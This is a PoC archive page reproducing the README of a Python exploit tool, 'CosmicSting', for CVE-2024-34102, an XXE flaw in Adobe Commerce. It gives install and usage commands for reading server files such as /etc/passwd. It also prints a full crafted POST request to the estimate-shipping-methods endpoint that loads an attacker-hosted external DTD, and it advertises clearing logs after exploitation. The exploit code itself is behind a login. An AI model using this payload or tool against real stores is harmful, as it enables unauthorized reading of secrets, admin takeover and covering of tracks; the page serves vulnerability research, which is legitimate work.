Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-34102 PoC — XXE can expose crypt key and other secrets granting full admin access

Source
https://github.com/bughuntar/CVE-2024-34102-Python
Associated Vulnerability
Title:XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)
Description:Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
Description
CVE-2024-34102 Exploiter based on Python
Readme
# CosmicSting CVE-2024-34102 Exploit

## Overview
CosmicSting is a Python script designed to exploit an XML External Entity (XXE) vulnerability (CVE-2024-34102) that could potentially lead to arbitrary code execution. This script demonstrates how an attacker could exploit such vulnerabilities to read sensitive files from a server using XML-based requests.

## Features
- Exploits an XXE vulnerability to execute malicious requests.
- Generates a callback URL for hosting a DTD file.
- Uses multi-threading for faster exploitation.
- Clears and removes instance logs on the SSRF API after exploitation.

## Requirements
- Python 3.x
- Dependencies:
  - `requests`
  - `click`
  - `fake_useragent`

## Installation
1. Clone the repository:
   ```bash
   git clone https://github.com/bughuntar/CVE-2024-34102-Python
   cd CVE-2024-34102-Python
   ```

2. Install dependencies using `pip`:
   ```bash
    pip install -r requirements.txt
    chmod +x *
   ```
## Usage
Run the script with the required URL parameter and optional file parameter:
```bash
python cosmic_sting.py --url <target_url> [--file <file_to_read>] [-t <threads>]
```

## Options:
- `-u, --url`: Specifies the URL or domain for vulnerability detection. This option is required.
- `-f, --file`: Allows specifying the file to read from the server. Defaults to `/etc/passwd` if not provided explicitly.
- `-t, --threads`: Specifies the number of concurrent threads to use for exploitation. Defaults to `5`.

## Example
Exploit a vulnerable URL:
```bash
python cosmic_sting.py --url https://example.com --file /etc/hosts -t 10
```

## Crafted XML DTD file POST request:
```
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
```

## Acknowledgements
This script is created by Professor the Hunter for educational purposes. Use it responsibly and only on systems you own or have permission to test.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →